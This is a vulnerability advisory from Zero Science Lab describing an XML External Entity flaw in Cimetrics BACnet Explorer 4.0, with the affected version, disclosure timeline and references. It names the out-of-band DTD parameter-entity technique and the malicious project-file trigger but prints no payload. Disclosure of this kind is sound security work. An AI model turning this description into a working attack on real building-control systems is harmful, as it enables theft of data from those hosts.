Cimetrics BACnet Explorer 4.0 XXE Vulnerability

Title: Cimetrics BACnet Explorer 4.0 XXE Vulnerability
Advisory ID: ZSL-2017-5398
Type: Local/Remote
Impact: Exposure of System Information, Exposure of Sensitive Information, DoS
Risk: (3/5)
Release Date: 12.02.2017
Summary
The BACnet Explorer is a BACnet client application that helps auto discover BACnet devices.
Description
BACnetExplorer suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack. The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project file.
Vendor
Cimetrics, Inc. - https://www.cimetrics.com
Affected Version
4.0.0.0
Tested On
Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vendor Status
[30.01.2017] Vulnerability discovered.
[31.01.2017] Vendor contacted.
[11.02.2017] No reply from the vendor.
[12.02.2017] Public security advisory released.
PoC
bacnetexplorer_xxe.txt
Credits
Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
References
[1] https://www.exploit-db.com/exploits/41321/
[2] https://cxsecurity.com/issue/WLB-2017020121
[3] https://packetstormsecurity.com/files/141054
[4] https://exchange.xforce.ibmcloud.com/vulnerabilities/122001
Changelog
[12.02.2017] - Initial release
[18.02.2017] - Added reference [1], [2], [3] and [4]
Contact
Zero Science Lab

Web: http://www.zeroscience.mk
e-mail: lab@zeroscience.mk